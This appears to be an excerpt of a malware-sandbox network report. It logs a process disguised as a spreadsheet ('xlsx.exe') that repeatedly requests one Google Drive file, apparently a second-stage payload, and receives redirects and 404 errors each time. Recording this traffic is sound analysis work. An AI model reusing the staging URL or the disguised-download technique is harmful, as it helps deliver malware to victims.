                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:48 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:48 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-vQMQnduumneXZ_l43aPvqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                        25          192.168.2.8  49777        142.250.181.1   443               928  C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:50 UTC  459                OUT        GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:51 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4jSESVVtciyM1x2PPtN-ZBJgeonaSh7COd5VA-a5cO-_NnXpuQA9_MZ7M8kAz8gLls
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:51 GMT
                                                        Content-Security-Policy: script-src 'nonce-n2sQLDlgYCtFP5QmtjCrLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:51 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NdGJkeI64Ghp_AS8UkgrIg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                        26          192.168.2.8  49783        172.217.19.174  443               928  C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:53 UTC  417                OUT        GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:54 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:53 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-N_iVBBLdnM8erTNw3PuiqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                        27          192.168.2.8  49793        142.250.181.1   443               928  C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:55 UTC  459                OUT        GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:56 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4cw1ma4l2OPdRW8fIHKqb0UyXyALYjuHmlKrtbbgEgLdzGSuFI2krHbmmYQfbeKo3_
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:56 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-tyiYeSxCHk1zei-kV--uFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:56 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="W-8Ab70lMV79lPnRCWqiFQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                        28          192.168.2.8  49800        172.217.19.174  443               928  C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:58 UTC  417                OUT        GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:59 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:59 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-7kGhdldxz3Z8n7qoHS8AKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                        29          192.168.2.8  49806        142.250.181.1   443               928  C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:59:01 UTC  459                OUT        GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:02 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4KZ4odGlUd1G_LJyB_j53JW4-iYxCcwcMKaPELOkFSjyzfEAX-yHOXM8hP6LQLQMTS
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:01 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-ywuEZEngkIzpTJnY2xpr8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:02 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tWz6L6HdaAVtuvRriu6YGA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        30 | 192.168.2.8 | 49812 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:03 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-E_Xhnoo8R4778TZGKlh0Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        31 | 192.168.2.8 | 49822 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:06 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:07 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6bP9KYGOA7GuGR_z2HfohlK_Nb9MWv3lb-qxFTmX8aVCz35umiZkK_ZloBPAE-5b8x
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:07 GMT
                                                        Content-Security-Policy: script-src 'nonce-zEulElOHZOtj3UQvRdyyUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:07 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l3YBoG1QR0CSrKgrTs5bNA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        32 | 192.168.2.8 | 49829 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:09 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-Go5HxtbGm_eOwOFf2Yl4pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
